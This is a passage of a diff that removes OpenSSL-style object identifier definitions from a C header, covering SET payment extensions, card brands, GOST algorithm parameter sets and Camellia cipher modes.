-#define OBJ_setct_CapReqTBE		OBJ_set_ctype,62L
-
-#define SN_setct_CapReqTBEX		"setct-CapReqTBEX"
-#define NID_setct_CapReqTBEX		581
-#define OBJ_setct_CapReqTBEX		OBJ_set_ctype,63L
-
-#define SN_setct_CapResTBE		"setct-CapResTBE"
-#define NID_setct_CapResTBE		582
-#define OBJ_setct_CapResTBE		OBJ_set_ctype,64L
-
-#define SN_setct_CapRevReqTBE		"setct-CapRevReqTBE"
-#define NID_setct_CapRevReqTBE		583
-#define OBJ_setct_CapRevReqTBE		OBJ_set_ctype,65L
-
-#define SN_setct_CapRevReqTBEX		"setct-CapRevReqTBEX"
-#define NID_setct_CapRevReqTBEX		584
-#define OBJ_setct_CapRevReqTBEX		OBJ_set_ctype,66L
-
-#define SN_setct_CapRevResTBE		"setct-CapRevResTBE"
-#define NID_setct_CapRevResTBE		585
-#define OBJ_setct_CapRevResTBE		OBJ_set_ctype,67L
-
-#define SN_setct_CredReqTBE		"setct-CredReqTBE"
-#define NID_setct_CredReqTBE		586
-#define OBJ_setct_CredReqTBE		OBJ_set_ctype,68L
-
-#define SN_setct_CredReqTBEX		"setct-CredReqTBEX"
-#define NID_setct_CredReqTBEX		587
-#define OBJ_setct_CredReqTBEX		OBJ_set_ctype,69L
-
-#define SN_setct_CredResTBE		"setct-CredResTBE"
-#define NID_setct_CredResTBE		588
-#define OBJ_setct_CredResTBE		OBJ_set_ctype,70L
-
-#define SN_setct_CredRevReqTBE		"setct-CredRevReqTBE"
-#define NID_setct_CredRevReqTBE		589
-#define OBJ_setct_CredRevReqTBE		OBJ_set_ctype,71L
-
-#define SN_setct_CredRevReqTBEX		"setct-CredRevReqTBEX"
-#define NID_setct_CredRevReqTBEX		590
-#define OBJ_setct_CredRevReqTBEX		OBJ_set_ctype,72L
-
-#define SN_setct_CredRevResTBE		"setct-CredRevResTBE"
-#define NID_setct_CredRevResTBE		591
-#define OBJ_setct_CredRevResTBE		OBJ_set_ctype,73L
-
-#define SN_setct_BatchAdminReqTBE		"setct-BatchAdminReqTBE"
-#define NID_setct_BatchAdminReqTBE		592
-#define OBJ_setct_BatchAdminReqTBE		OBJ_set_ctype,74L
-
-#define SN_setct_BatchAdminResTBE		"setct-BatchAdminResTBE"
-#define NID_setct_BatchAdminResTBE		593
-#define OBJ_setct_BatchAdminResTBE		OBJ_set_ctype,75L
-
-#define SN_setct_RegFormReqTBE		"setct-RegFormReqTBE"
-#define NID_setct_RegFormReqTBE		594
-#define OBJ_setct_RegFormReqTBE		OBJ_set_ctype,76L
-
-#define SN_setct_CertReqTBE		"setct-CertReqTBE"
-#define NID_setct_CertReqTBE		595
-#define OBJ_setct_CertReqTBE		OBJ_set_ctype,77L
-
-#define SN_setct_CertReqTBEX		"setct-CertReqTBEX"
-#define NID_setct_CertReqTBEX		596
-#define OBJ_setct_CertReqTBEX		OBJ_set_ctype,78L
-
-#define SN_setct_CertResTBE		"setct-CertResTBE"
-#define NID_setct_CertResTBE		597
-#define OBJ_setct_CertResTBE		OBJ_set_ctype,79L
-
-#define SN_setct_CRLNotificationTBS		"setct-CRLNotificationTBS"
-#define NID_setct_CRLNotificationTBS		598
-#define OBJ_setct_CRLNotificationTBS		OBJ_set_ctype,80L
-
-#define SN_setct_CRLNotificationResTBS		"setct-CRLNotificationResTBS"
-#define NID_setct_CRLNotificationResTBS		599
-#define OBJ_setct_CRLNotificationResTBS		OBJ_set_ctype,81L
-
-#define SN_setct_BCIDistributionTBS		"setct-BCIDistributionTBS"
-#define NID_setct_BCIDistributionTBS		600
-#define OBJ_setct_BCIDistributionTBS		OBJ_set_ctype,82L
-
-#define SN_setext_genCrypt		"setext-genCrypt"
-#define LN_setext_genCrypt		"generic cryptogram"
-#define NID_setext_genCrypt		601
-#define OBJ_setext_genCrypt		OBJ_set_msgExt,1L
-
-#define SN_setext_miAuth		"setext-miAuth"
-#define LN_setext_miAuth		"merchant initiated auth"
-#define NID_setext_miAuth		602
-#define OBJ_setext_miAuth		OBJ_set_msgExt,3L
-
-#define SN_setext_pinSecure		"setext-pinSecure"
-#define NID_setext_pinSecure		603
-#define OBJ_setext_pinSecure		OBJ_set_msgExt,4L
-
-#define SN_setext_pinAny		"setext-pinAny"
-#define NID_setext_pinAny		604
-#define OBJ_setext_pinAny		OBJ_set_msgExt,5L
-
-#define SN_setext_track2		"setext-track2"
-#define NID_setext_track2		605
-#define OBJ_setext_track2		OBJ_set_msgExt,7L
-
-#define SN_setext_cv		"setext-cv"
-#define LN_setext_cv		"additional verification"
-#define NID_setext_cv		606
-#define OBJ_setext_cv		OBJ_set_msgExt,8L
-
-#define SN_set_policy_root		"set-policy-root"
-#define NID_set_policy_root		607
-#define OBJ_set_policy_root		OBJ_set_policy,0L
-
-#define SN_setCext_hashedRoot		"setCext-hashedRoot"
-#define NID_setCext_hashedRoot		608
-#define OBJ_setCext_hashedRoot		OBJ_set_certExt,0L
-
-#define SN_setCext_certType		"setCext-certType"
-#define NID_setCext_certType		609
-#define OBJ_setCext_certType		OBJ_set_certExt,1L
-
-#define SN_setCext_merchData		"setCext-merchData"
-#define NID_setCext_merchData		610
-#define OBJ_setCext_merchData		OBJ_set_certExt,2L
-
-#define SN_setCext_cCertRequired		"setCext-cCertRequired"
-#define NID_setCext_cCertRequired		611
-#define OBJ_setCext_cCertRequired		OBJ_set_certExt,3L
-
-#define SN_setCext_tunneling		"setCext-tunneling"
-#define NID_setCext_tunneling		612
-#define OBJ_setCext_tunneling		OBJ_set_certExt,4L
-
-#define SN_setCext_setExt		"setCext-setExt"
-#define NID_setCext_setExt		613
-#define OBJ_setCext_setExt		OBJ_set_certExt,5L
-
-#define SN_setCext_setQualf		"setCext-setQualf"
-#define NID_setCext_setQualf		614
-#define OBJ_setCext_setQualf		OBJ_set_certExt,6L
-
-#define SN_setCext_PGWYcapabilities		"setCext-PGWYcapabilities"
-#define NID_setCext_PGWYcapabilities		615
-#define OBJ_setCext_PGWYcapabilities		OBJ_set_certExt,7L
-
-#define SN_setCext_TokenIdentifier		"setCext-TokenIdentifier"
-#define NID_setCext_TokenIdentifier		616
-#define OBJ_setCext_TokenIdentifier		OBJ_set_certExt,8L
-
-#define SN_setCext_Track2Data		"setCext-Track2Data"
-#define NID_setCext_Track2Data		617
-#define OBJ_setCext_Track2Data		OBJ_set_certExt,9L
-
-#define SN_setCext_TokenType		"setCext-TokenType"
-#define NID_setCext_TokenType		618
-#define OBJ_setCext_TokenType		OBJ_set_certExt,10L
-
-#define SN_setCext_IssuerCapabilities		"setCext-IssuerCapabilities"
-#define NID_setCext_IssuerCapabilities		619
-#define OBJ_setCext_IssuerCapabilities		OBJ_set_certExt,11L
-
-#define SN_setAttr_Cert		"setAttr-Cert"
-#define NID_setAttr_Cert		620
-#define OBJ_setAttr_Cert		OBJ_set_attr,0L
-
-#define SN_setAttr_PGWYcap		"setAttr-PGWYcap"
-#define LN_setAttr_PGWYcap		"payment gateway capabilities"
-#define NID_setAttr_PGWYcap		621
-#define OBJ_setAttr_PGWYcap		OBJ_set_attr,1L
-
-#define SN_setAttr_TokenType		"setAttr-TokenType"
-#define NID_setAttr_TokenType		622
-#define OBJ_setAttr_TokenType		OBJ_set_attr,2L
-
-#define SN_setAttr_IssCap		"setAttr-IssCap"
-#define LN_setAttr_IssCap		"issuer capabilities"
-#define NID_setAttr_IssCap		623
-#define OBJ_setAttr_IssCap		OBJ_set_attr,3L
-
-#define SN_set_rootKeyThumb		"set-rootKeyThumb"
-#define NID_set_rootKeyThumb		624
-#define OBJ_set_rootKeyThumb		OBJ_setAttr_Cert,0L
-
-#define SN_set_addPolicy		"set-addPolicy"
-#define NID_set_addPolicy		625
-#define OBJ_set_addPolicy		OBJ_setAttr_Cert,1L
-
-#define SN_setAttr_Token_EMV		"setAttr-Token-EMV"
-#define NID_setAttr_Token_EMV		626
-#define OBJ_setAttr_Token_EMV		OBJ_setAttr_TokenType,1L
-
-#define SN_setAttr_Token_B0Prime		"setAttr-Token-B0Prime"
-#define NID_setAttr_Token_B0Prime		627
-#define OBJ_setAttr_Token_B0Prime		OBJ_setAttr_TokenType,2L
-
-#define SN_setAttr_IssCap_CVM		"setAttr-IssCap-CVM"
-#define NID_setAttr_IssCap_CVM		628
-#define OBJ_setAttr_IssCap_CVM		OBJ_setAttr_IssCap,3L
-
-#define SN_setAttr_IssCap_T2		"setAttr-IssCap-T2"
-#define NID_setAttr_IssCap_T2		629
-#define OBJ_setAttr_IssCap_T2		OBJ_setAttr_IssCap,4L
-
-#define SN_setAttr_IssCap_Sig		"setAttr-IssCap-Sig"
-#define NID_setAttr_IssCap_Sig		630
-#define OBJ_setAttr_IssCap_Sig		OBJ_setAttr_IssCap,5L
-
-#define SN_setAttr_GenCryptgrm		"setAttr-GenCryptgrm"
-#define LN_setAttr_GenCryptgrm		"generate cryptogram"
-#define NID_setAttr_GenCryptgrm		631
-#define OBJ_setAttr_GenCryptgrm		OBJ_setAttr_IssCap_CVM,1L
-
-#define SN_setAttr_T2Enc		"setAttr-T2Enc"
-#define LN_setAttr_T2Enc		"encrypted track 2"
-#define NID_setAttr_T2Enc		632
-#define OBJ_setAttr_T2Enc		OBJ_setAttr_IssCap_T2,1L
-
-#define SN_setAttr_T2cleartxt		"setAttr-T2cleartxt"
-#define LN_setAttr_T2cleartxt		"cleartext track 2"
-#define NID_setAttr_T2cleartxt		633
-#define OBJ_setAttr_T2cleartxt		OBJ_setAttr_IssCap_T2,2L
-
-#define SN_setAttr_TokICCsig		"setAttr-TokICCsig"
-#define LN_setAttr_TokICCsig		"ICC or token signature"
-#define NID_setAttr_TokICCsig		634
-#define OBJ_setAttr_TokICCsig		OBJ_setAttr_IssCap_Sig,1L
-
-#define SN_setAttr_SecDevSig		"setAttr-SecDevSig"
-#define LN_setAttr_SecDevSig		"secure device signature"
-#define NID_setAttr_SecDevSig		635
-#define OBJ_setAttr_SecDevSig		OBJ_setAttr_IssCap_Sig,2L
-
-#define SN_set_brand_IATA_ATA		"set-brand-IATA-ATA"
-#define NID_set_brand_IATA_ATA		636
-#define OBJ_set_brand_IATA_ATA		OBJ_set_brand,1L
-
-#define SN_set_brand_Diners		"set-brand-Diners"
-#define NID_set_brand_Diners		637
-#define OBJ_set_brand_Diners		OBJ_set_brand,30L
-
-#define SN_set_brand_AmericanExpress		"set-brand-AmericanExpress"
-#define NID_set_brand_AmericanExpress		638
-#define OBJ_set_brand_AmericanExpress		OBJ_set_brand,34L
-
-#define SN_set_brand_JCB		"set-brand-JCB"
-#define NID_set_brand_JCB		639
-#define OBJ_set_brand_JCB		OBJ_set_brand,35L
-
-#define SN_set_brand_Visa		"set-brand-Visa"
-#define NID_set_brand_Visa		640
-#define OBJ_set_brand_Visa		OBJ_set_brand,4L
-
-#define SN_set_brand_MasterCard		"set-brand-MasterCard"
-#define NID_set_brand_MasterCard		641
-#define OBJ_set_brand_MasterCard		OBJ_set_brand,5L
-
-#define SN_set_brand_Novus		"set-brand-Novus"
-#define NID_set_brand_Novus		642
-#define OBJ_set_brand_Novus		OBJ_set_brand,6011L
-
-#define SN_des_cdmf		"DES-CDMF"
-#define LN_des_cdmf		"des-cdmf"
-#define NID_des_cdmf		643
-#define OBJ_des_cdmf		OBJ_rsadsi,3L,10L
-
-#define SN_rsaOAEPEncryptionSET		"rsaOAEPEncryptionSET"
-#define NID_rsaOAEPEncryptionSET		644
-#define OBJ_rsaOAEPEncryptionSET		OBJ_rsadsi,1L,1L,6L
-
-#define SN_ipsec3		"Oakley-EC2N-3"
-#define LN_ipsec3		"ipsec3"
-#define NID_ipsec3		749
-
-#define SN_ipsec4		"Oakley-EC2N-4"
-#define LN_ipsec4		"ipsec4"
-#define NID_ipsec4		750
-
-#define SN_whirlpool		"whirlpool"
-#define NID_whirlpool		804
-#define OBJ_whirlpool		OBJ_iso,0L,10118L,3L,0L,55L
-
-#define SN_cryptopro		"cryptopro"
-#define NID_cryptopro		805
-#define OBJ_cryptopro		OBJ_member_body,643L,2L,2L
-
-#define SN_cryptocom		"cryptocom"
-#define NID_cryptocom		806
-#define OBJ_cryptocom		OBJ_member_body,643L,2L,9L
-
-#define SN_id_GostR3411_94_with_GostR3410_2001		"id-GostR3411-94-with-GostR3410-2001"
-#define LN_id_GostR3411_94_with_GostR3410_2001		"GOST R 34.11-94 with GOST R 34.10-2001"
-#define NID_id_GostR3411_94_with_GostR3410_2001		807
-#define OBJ_id_GostR3411_94_with_GostR3410_2001		OBJ_cryptopro,3L
-
-#define SN_id_GostR3411_94_with_GostR3410_94		"id-GostR3411-94-with-GostR3410-94"
-#define LN_id_GostR3411_94_with_GostR3410_94		"GOST R 34.11-94 with GOST R 34.10-94"
-#define NID_id_GostR3411_94_with_GostR3410_94		808
-#define OBJ_id_GostR3411_94_with_GostR3410_94		OBJ_cryptopro,4L
-
-#define SN_id_GostR3411_94		"md_gost94"
-#define LN_id_GostR3411_94		"GOST R 34.11-94"
-#define NID_id_GostR3411_94		809
-#define OBJ_id_GostR3411_94		OBJ_cryptopro,9L
-
-#define SN_id_HMACGostR3411_94		"id-HMACGostR3411-94"
-#define LN_id_HMACGostR3411_94		"HMAC GOST 34.11-94"
-#define NID_id_HMACGostR3411_94		810
-#define OBJ_id_HMACGostR3411_94		OBJ_cryptopro,10L
-
-#define SN_id_GostR3410_2001		"gost2001"
-#define LN_id_GostR3410_2001		"GOST R 34.10-2001"
-#define NID_id_GostR3410_2001		811
-#define OBJ_id_GostR3410_2001		OBJ_cryptopro,19L
-
-#define SN_id_GostR3410_94		"gost94"
-#define LN_id_GostR3410_94		"GOST R 34.10-94"
-#define NID_id_GostR3410_94		812
-#define OBJ_id_GostR3410_94		OBJ_cryptopro,20L
-
-#define SN_id_Gost28147_89		"gost89"
-#define LN_id_Gost28147_89		"GOST 28147-89"
-#define NID_id_Gost28147_89		813
-#define OBJ_id_Gost28147_89		OBJ_cryptopro,21L
-
-#define SN_gost89_cnt		"gost89-cnt"
-#define NID_gost89_cnt		814
-
-#define SN_id_Gost28147_89_MAC		"gost-mac"
-#define LN_id_Gost28147_89_MAC		"GOST 28147-89 MAC"
-#define NID_id_Gost28147_89_MAC		815
-#define OBJ_id_Gost28147_89_MAC		OBJ_cryptopro,22L
-
-#define SN_id_GostR3411_94_prf		"prf-gostr3411-94"
-#define LN_id_GostR3411_94_prf		"GOST R 34.11-94 PRF"
-#define NID_id_GostR3411_94_prf		816
-#define OBJ_id_GostR3411_94_prf		OBJ_cryptopro,23L
-
-#define SN_id_GostR3410_2001DH		"id-GostR3410-2001DH"
-#define LN_id_GostR3410_2001DH		"GOST R 34.10-2001 DH"
-#define NID_id_GostR3410_2001DH		817
-#define OBJ_id_GostR3410_2001DH		OBJ_cryptopro,98L
-
-#define SN_id_GostR3410_94DH		"id-GostR3410-94DH"
-#define LN_id_GostR3410_94DH		"GOST R 34.10-94 DH"
-#define NID_id_GostR3410_94DH		818
-#define OBJ_id_GostR3410_94DH		OBJ_cryptopro,99L
-
-#define SN_id_Gost28147_89_CryptoPro_KeyMeshing		"id-Gost28147-89-CryptoPro-KeyMeshing"
-#define NID_id_Gost28147_89_CryptoPro_KeyMeshing		819
-#define OBJ_id_Gost28147_89_CryptoPro_KeyMeshing		OBJ_cryptopro,14L,1L
-
-#define SN_id_Gost28147_89_None_KeyMeshing		"id-Gost28147-89-None-KeyMeshing"
-#define NID_id_Gost28147_89_None_KeyMeshing		820
-#define OBJ_id_Gost28147_89_None_KeyMeshing		OBJ_cryptopro,14L,0L
-
-#define SN_id_GostR3411_94_TestParamSet		"id-GostR3411-94-TestParamSet"
-#define NID_id_GostR3411_94_TestParamSet		821
-#define OBJ_id_GostR3411_94_TestParamSet		OBJ_cryptopro,30L,0L
-
-#define SN_id_GostR3411_94_CryptoProParamSet		"id-GostR3411-94-CryptoProParamSet"
-#define NID_id_GostR3411_94_CryptoProParamSet		822
-#define OBJ_id_GostR3411_94_CryptoProParamSet		OBJ_cryptopro,30L,1L
-
-#define SN_id_Gost28147_89_TestParamSet		"id-Gost28147-89-TestParamSet"
-#define NID_id_Gost28147_89_TestParamSet		823
-#define OBJ_id_Gost28147_89_TestParamSet		OBJ_cryptopro,31L,0L
-
-#define SN_id_Gost28147_89_CryptoPro_A_ParamSet		"id-Gost28147-89-CryptoPro-A-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_A_ParamSet		824
-#define OBJ_id_Gost28147_89_CryptoPro_A_ParamSet		OBJ_cryptopro,31L,1L
-
-#define SN_id_Gost28147_89_CryptoPro_B_ParamSet		"id-Gost28147-89-CryptoPro-B-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_B_ParamSet		825
-#define OBJ_id_Gost28147_89_CryptoPro_B_ParamSet		OBJ_cryptopro,31L,2L
-
-#define SN_id_Gost28147_89_CryptoPro_C_ParamSet		"id-Gost28147-89-CryptoPro-C-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_C_ParamSet		826
-#define OBJ_id_Gost28147_89_CryptoPro_C_ParamSet		OBJ_cryptopro,31L,3L
-
-#define SN_id_Gost28147_89_CryptoPro_D_ParamSet		"id-Gost28147-89-CryptoPro-D-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_D_ParamSet		827
-#define OBJ_id_Gost28147_89_CryptoPro_D_ParamSet		OBJ_cryptopro,31L,4L
-
-#define SN_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		"id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		828
-#define OBJ_id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		OBJ_cryptopro,31L,5L
-
-#define SN_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		"id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		829
-#define OBJ_id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		OBJ_cryptopro,31L,6L
-
-#define SN_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		"id-Gost28147-89-CryptoPro-RIC-1-ParamSet"
-#define NID_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		830
-#define OBJ_id_Gost28147_89_CryptoPro_RIC_1_ParamSet		OBJ_cryptopro,31L,7L
-
-#define SN_id_GostR3410_94_TestParamSet		"id-GostR3410-94-TestParamSet"
-#define NID_id_GostR3410_94_TestParamSet		831
-#define OBJ_id_GostR3410_94_TestParamSet		OBJ_cryptopro,32L,0L
-
-#define SN_id_GostR3410_94_CryptoPro_A_ParamSet		"id-GostR3410-94-CryptoPro-A-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_A_ParamSet		832
-#define OBJ_id_GostR3410_94_CryptoPro_A_ParamSet		OBJ_cryptopro,32L,2L
-
-#define SN_id_GostR3410_94_CryptoPro_B_ParamSet		"id-GostR3410-94-CryptoPro-B-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_B_ParamSet		833
-#define OBJ_id_GostR3410_94_CryptoPro_B_ParamSet		OBJ_cryptopro,32L,3L
-
-#define SN_id_GostR3410_94_CryptoPro_C_ParamSet		"id-GostR3410-94-CryptoPro-C-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_C_ParamSet		834
-#define OBJ_id_GostR3410_94_CryptoPro_C_ParamSet		OBJ_cryptopro,32L,4L
-
-#define SN_id_GostR3410_94_CryptoPro_D_ParamSet		"id-GostR3410-94-CryptoPro-D-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_D_ParamSet		835
-#define OBJ_id_GostR3410_94_CryptoPro_D_ParamSet		OBJ_cryptopro,32L,5L
-
-#define SN_id_GostR3410_94_CryptoPro_XchA_ParamSet		"id-GostR3410-94-CryptoPro-XchA-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_XchA_ParamSet		836
-#define OBJ_id_GostR3410_94_CryptoPro_XchA_ParamSet		OBJ_cryptopro,33L,1L
-
-#define SN_id_GostR3410_94_CryptoPro_XchB_ParamSet		"id-GostR3410-94-CryptoPro-XchB-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_XchB_ParamSet		837
-#define OBJ_id_GostR3410_94_CryptoPro_XchB_ParamSet		OBJ_cryptopro,33L,2L
-
-#define SN_id_GostR3410_94_CryptoPro_XchC_ParamSet		"id-GostR3410-94-CryptoPro-XchC-ParamSet"
-#define NID_id_GostR3410_94_CryptoPro_XchC_ParamSet		838
-#define OBJ_id_GostR3410_94_CryptoPro_XchC_ParamSet		OBJ_cryptopro,33L,3L
-
-#define SN_id_GostR3410_2001_TestParamSet		"id-GostR3410-2001-TestParamSet"
-#define NID_id_GostR3410_2001_TestParamSet		839
-#define OBJ_id_GostR3410_2001_TestParamSet		OBJ_cryptopro,35L,0L
-
-#define SN_id_GostR3410_2001_CryptoPro_A_ParamSet		"id-GostR3410-2001-CryptoPro-A-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_A_ParamSet		840
-#define OBJ_id_GostR3410_2001_CryptoPro_A_ParamSet		OBJ_cryptopro,35L,1L
-
-#define SN_id_GostR3410_2001_CryptoPro_B_ParamSet		"id-GostR3410-2001-CryptoPro-B-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_B_ParamSet		841
-#define OBJ_id_GostR3410_2001_CryptoPro_B_ParamSet		OBJ_cryptopro,35L,2L
-
-#define SN_id_GostR3410_2001_CryptoPro_C_ParamSet		"id-GostR3410-2001-CryptoPro-C-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_C_ParamSet		842
-#define OBJ_id_GostR3410_2001_CryptoPro_C_ParamSet		OBJ_cryptopro,35L,3L
-
-#define SN_id_GostR3410_2001_CryptoPro_XchA_ParamSet		"id-GostR3410-2001-CryptoPro-XchA-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_XchA_ParamSet		843
-#define OBJ_id_GostR3410_2001_CryptoPro_XchA_ParamSet		OBJ_cryptopro,36L,0L
-
-#define SN_id_GostR3410_2001_CryptoPro_XchB_ParamSet		"id-GostR3410-2001-CryptoPro-XchB-ParamSet"
-#define NID_id_GostR3410_2001_CryptoPro_XchB_ParamSet		844
-#define OBJ_id_GostR3410_2001_CryptoPro_XchB_ParamSet		OBJ_cryptopro,36L,1L
-
-#define SN_id_GostR3410_94_a		"id-GostR3410-94-a"
-#define NID_id_GostR3410_94_a		845
-#define OBJ_id_GostR3410_94_a		OBJ_id_GostR3410_94,1L
-
-#define SN_id_GostR3410_94_aBis		"id-GostR3410-94-aBis"
-#define NID_id_GostR3410_94_aBis		846
-#define OBJ_id_GostR3410_94_aBis		OBJ_id_GostR3410_94,2L
-
-#define SN_id_GostR3410_94_b		"id-GostR3410-94-b"
-#define NID_id_GostR3410_94_b		847
-#define OBJ_id_GostR3410_94_b		OBJ_id_GostR3410_94,3L
-
-#define SN_id_GostR3410_94_bBis		"id-GostR3410-94-bBis"
-#define NID_id_GostR3410_94_bBis		848
-#define OBJ_id_GostR3410_94_bBis		OBJ_id_GostR3410_94,4L
-
-#define SN_id_Gost28147_89_cc		"id-Gost28147-89-cc"
-#define LN_id_Gost28147_89_cc		"GOST 28147-89 Cryptocom ParamSet"
-#define NID_id_Gost28147_89_cc		849
-#define OBJ_id_Gost28147_89_cc		OBJ_cryptocom,1L,6L,1L
-
-#define SN_id_GostR3410_94_cc		"gost94cc"
-#define LN_id_GostR3410_94_cc		"GOST 34.10-94 Cryptocom"
-#define NID_id_GostR3410_94_cc		850
-#define OBJ_id_GostR3410_94_cc		OBJ_cryptocom,1L,5L,3L
-
-#define SN_id_GostR3410_2001_cc		"gost2001cc"
-#define LN_id_GostR3410_2001_cc		"GOST 34.10-2001 Cryptocom"
-#define NID_id_GostR3410_2001_cc		851
-#define OBJ_id_GostR3410_2001_cc		OBJ_cryptocom,1L,5L,4L
-
-#define SN_id_GostR3411_94_with_GostR3410_94_cc		"id-GostR3411-94-with-GostR3410-94-cc"
-#define LN_id_GostR3411_94_with_GostR3410_94_cc		"GOST R 34.11-94 with GOST R 34.10-94 Cryptocom"
-#define NID_id_GostR3411_94_with_GostR3410_94_cc		852
-#define OBJ_id_GostR3411_94_with_GostR3410_94_cc		OBJ_cryptocom,1L,3L,3L
-
-#define SN_id_GostR3411_94_with_GostR3410_2001_cc		"id-GostR3411-94-with-GostR3410-2001-cc"
-#define LN_id_GostR3411_94_with_GostR3410_2001_cc		"GOST R 34.11-94 with GOST R 34.10-2001 Cryptocom"
-#define NID_id_GostR3411_94_with_GostR3410_2001_cc		853
-#define OBJ_id_GostR3411_94_with_GostR3410_2001_cc		OBJ_cryptocom,1L,3L,4L
-
-#define SN_id_GostR3410_2001_ParamSet_cc		"id-GostR3410-2001-ParamSet-cc"
-#define LN_id_GostR3410_2001_ParamSet_cc		"GOST R 3410-2001 Parameter Set Cryptocom"
-#define NID_id_GostR3410_2001_ParamSet_cc		854
-#define OBJ_id_GostR3410_2001_ParamSet_cc		OBJ_cryptocom,1L,8L,1L
-
-#define SN_camellia_128_cbc		"CAMELLIA-128-CBC"
-#define LN_camellia_128_cbc		"camellia-128-cbc"
-#define NID_camellia_128_cbc		751
-#define OBJ_camellia_128_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,2L
-
-#define SN_camellia_192_cbc		"CAMELLIA-192-CBC"
-#define LN_camellia_192_cbc		"camellia-192-cbc"
-#define NID_camellia_192_cbc		752
-#define OBJ_camellia_192_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,3L
-
-#define SN_camellia_256_cbc		"CAMELLIA-256-CBC"
-#define LN_camellia_256_cbc		"camellia-256-cbc"
-#define NID_camellia_256_cbc		753
-#define OBJ_camellia_256_cbc		1L,2L,392L,200011L,61L,1L,1L,1L,4L
-
-#define SN_id_camellia128_wrap		"id-camellia128-wrap"
-#define NID_id_camellia128_wrap		907
-#define OBJ_id_camellia128_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,2L
-
-#define SN_id_camellia192_wrap		"id-camellia192-wrap"
-#define NID_id_camellia192_wrap		908
-#define OBJ_id_camellia192_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,3L
-
-#define SN_id_camellia256_wrap		"id-camellia256-wrap"
-#define NID_id_camellia256_wrap		909
-#define OBJ_id_camellia256_wrap		1L,2L,392L,200011L,61L,1L,1L,3L,4L
-
-#define OBJ_ntt_ds		0L,3L,4401L,5L
-
-#define OBJ_camellia		OBJ_ntt_ds,3L,1L,9L
-
-#define SN_camellia_128_ecb		"CAMELLIA-128-ECB"
-#define LN_camellia_128_ecb		"camellia-128-ecb"
-#define NID_camellia_128_ecb		754
-#define OBJ_camellia_128_ecb		OBJ_camellia,1L
-
-#define SN_camellia_128_ofb128		"CAMELLIA-128-OFB"
-#define LN_camellia_128_ofb128		"camellia-128-ofb"
-#define NID_camellia_128_ofb128		766
-#define OBJ_camellia_128_ofb128		OBJ_camellia,3L
-
-#define SN_camellia_128_cfb128		"CAMELLIA-128-CFB"
-#define LN_camellia_128_cfb128		"camellia-128-cfb"
-#define NID_camellia_128_cfb128		757
-#define OBJ_camellia_128_cfb128		OBJ_camellia,4L
-
-#define SN_camellia_192_ecb		"CAMELLIA-192-ECB"
-#define LN_camellia_192_ecb		"camellia-192-ecb"
-#define NID_camellia_192_ecb		755
-#define OBJ_camellia_192_ecb		OBJ_camellia,21L
-
-#define SN_camellia_192_ofb128		"CAMELLIA-192-OFB"
-#define LN_camellia_192_ofb128		"camellia-192-ofb"
-#define NID_camellia_192_ofb128		767
-#define OBJ_camellia_192_ofb128		OBJ_camellia,23L
-
-#define SN_camellia_192_cfb128		"CAMELLIA-192-CFB"
-#define LN_camellia_192_cfb128		"camellia-192-cfb"
-#define NID_camellia_192_cfb128		758
-#define OBJ_camellia_192_cfb128		OBJ_camellia,24L
-
-#define SN_camellia_256_ecb		"CAMELLIA-256-ECB"
-#define LN_camellia_256_ecb		"camellia-256-ecb"
-#define NID_camellia_256_ecb		756
-#define OBJ_camellia_256_ecb		OBJ_camellia,41L
-
-#define SN_camellia_256_ofb128		"CAMELLIA-256-OFB"
-#define LN_camellia_256_ofb128		"camellia-256-ofb"
-#define NID_camellia_256_ofb128		768
-#define OBJ_camellia_256_ofb128		OBJ_camellia,43L
-
-#define SN_camellia_256_cfb128		"CAMELLIA-256-CFB"
-#define LN_camellia_256_cfb128		"camellia-256-cfb"
-#define NID_camellia_256_cfb128		759
-#define OBJ_camellia_256_cfb128		OBJ_camellia,44L
-
-#define SN_camellia_128_cfb1		"CAMELLIA-128-CFB1"
-#define LN_camellia_128_cfb1		"camellia-128-cfb1"
-#define NID_camellia_128_cfb1		760
-
-#define SN_camellia_192_cfb1		"CAMELLIA-192-CFB1"
-#define LN_camellia_192_cfb1		"camellia-192-cfb1"
-#define NID_camellia_192_cfb1		761
-
-#define SN_camellia_256_cfb1		"CAMELLIA-256-CFB1"
-#define LN_camellia_256_cfb1		"camellia-256-cfb1"
-#define NID_camellia_256_cfb1		762
-
-#define SN_camellia_128_cfb8		"CAMELLIA-128-CFB8"
-#define LN_camellia_128_cfb8		"camellia-128-cfb8"
-#define NID_camellia_128_cfb8		763
-
-#define SN_camellia_192_cfb8		"CAMELLIA-192-CFB8"
-#define LN_camellia_192_cfb8		"camellia-192-cfb8"
-#define NID_camellia_192_cfb8		764
-
-#define SN_camellia_256_cfb8		"CAMELLIA-256-CFB8"
-#define LN_camellia_256_cfb8		"camellia-256-cfb8"
-#define NID_camellia_256_cfb8		765
-
-#define SN_kisa		"KISA"
-#define LN_kisa		"kisa"
-#define NID_kisa		773
-#define OBJ_kisa		OBJ_member_body,410L,200004L
-
-#define SN_seed_ecb		"SEED-ECB"
-#define LN_seed_ecb		"seed-ecb"
